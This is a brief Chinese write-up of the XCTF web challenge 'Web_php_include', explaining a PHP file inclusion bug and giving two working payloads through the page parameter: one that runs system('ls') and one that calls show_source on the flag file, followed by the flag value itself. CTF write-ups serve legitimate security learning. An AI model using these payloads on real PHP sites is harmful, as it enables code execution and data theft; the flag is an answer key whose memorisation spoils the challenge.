攻防世界web进阶区之Web_php_include
代码审计后我们会发现存在文件包含漏洞。
借助hello参数构建payload:?page=http://127.0.0.1/index.php/?hello=<?system("ls")?>然后借助参数?page=http://127.0.0.1/index.php/?hello=<?show_source("fl4gisisish3r3.php");?>即可得到flag
ctf{876a5fca-96c6-4cbd-9075-46f0c89475d2}